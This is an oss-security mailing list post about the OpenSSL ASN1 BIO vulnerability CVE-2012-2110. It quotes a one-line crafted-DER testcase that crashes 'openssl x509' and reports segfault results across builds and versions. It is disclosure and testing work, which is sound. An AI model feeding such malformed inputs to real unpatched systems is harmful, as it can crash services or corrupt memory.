oss-sec mailing list archives
Re: OpenSSL ASN1 BIO vulnerability (CVE-2012-2110)
From: Solar Designer <solar () openwall com>
Date: Sun, 22 Apr 2012 16:23:11 +0400
Hi,

On Fri, Apr 20, 2012 at 01:11:19PM +0400, Solar Designer wrote:
> Tavis Ormandy of Google Security Team found a vulnerability in OpenSSL:
> incorrect integer conversions in OpenSSL can result in memory corruption.
>
> http://lists.openwall.net/full-disclosure/2012/04/19/4
>
> Advisory from OpenSSL:
>
> http://openssl.org/news/secadv_20120419.txt

Tavis posted a followup to my message, where he attached a testcase that
was unfortunately above oss-security's message size limit - so the
message did not make it to the list.  I've gzip-compressed the file and
have re-attached it to this message now (it's only 3 KB when compressed).

Tavis' message was:

On Fri, Apr 20, 2012 at 09:20:39PM +0200, Tavis Ormandy wrote:
> FWIW, here is the testcase I sent to openssl-team.  A smaller one that's
> easier to test is this:
>
> $ printf "\xe3\x80\x81\x84\xe3\x80\x00\x00\x00\x00" | openssl x509 -inform DER
>
> Tavis.

FWIW, trying these two on OpenSSL 1.0.0d (the Owl package, which includes
some unrelated patches), I get:

x86_64 build:

$ printf "\xe3\x80\x81\x84\xe3\x80\x00\x00\x00\x00" | openssl x509 -inform DER
Segmentation fault
$ openssl x509 -inform DER < openssl-1.0.1-testcase-32bit.crt
unable to load certificate
47191757631152:error:0D0680A8:asn1 encoding routines:ASN1_CHECK_TLEN:wrong tag:tasn_dec.c:1319:
47191757631152:error:0D07803A:asn1 encoding routines:ASN1_ITEM_EX_D2I:nested asn1 error:tasn_dec.c:381:Type=X509

i686 build:

$ printf "\xe3\x80\x81\x84\xe3\x80\x00\x00\x00\x00" | openssl x509 -inform DER
unable to load certificate
3082893472:error:0D07207B:asn1 encoding routines:ASN1_get_object:header too long:asn1_lib.c:150:
$ openssl x509 -inform DER < openssl-1.0.1-testcase-32bit.crt
unable to load certificate
3083593888:error:0D0680A8:asn1 encoding routines:ASN1_CHECK_TLEN:wrong tag:tasn_dec.c:1319:
3083593888:error:0D07803A:asn1 encoding routines:ASN1_ITEM_EX_D2I:nested asn1 error:tasn_dec.c:381:Type=X509

So no luck triggering a crash on 32-bit, although we must patch the issue
on 32-bit as well.  I'm not sure if I am using the larger testcase
correctly, though.  I am not familiar with this.

The smaller testcase also triggers a segfault on OpenSSL 0.9.7m (with
unrelated patches) on x86_64.  So not surprisingly some versions older
than 0.9.8 are vulnerable as well.

Alexander
Attachment: openssl-1.0.1-testcase-32bit.crt.gz
Current thread:
- OpenSSL ASN1 BIO vulnerability (CVE-2012-2110) Solar Designer (Apr 20)
- Re: OpenSSL ASN1 BIO vulnerability (CVE-2012-2110) Solar Designer (Apr 22)
- Re: OpenSSL ASN1 BIO vulnerability (CVE-2012-2110) Solar Designer (Apr 22)
- Re: OpenSSL ASN1 BIO vulnerability (CVE-2012-2110) Tomas Hoger (Apr 24)
- Re: OpenSSL ASN1 BIO vulnerability (CVE-2012-2110) Tavis Ormandy (Apr 24)
- Re: OpenSSL ASN1 BIO vulnerability (CVE-2012-2110) Solar Designer (Apr 24)
- Re: OpenSSL ASN1 BIO vulnerability (CVE-2012-2110) Solar Designer (Apr 22)
- Re: OpenSSL ASN1 BIO vulnerability (CVE-2012-2110) Tavis Ormandy (Apr 24)
- Re: OpenSSL ASN1 BIO vulnerability (CVE-2012-2110) Solar Designer (Apr 22)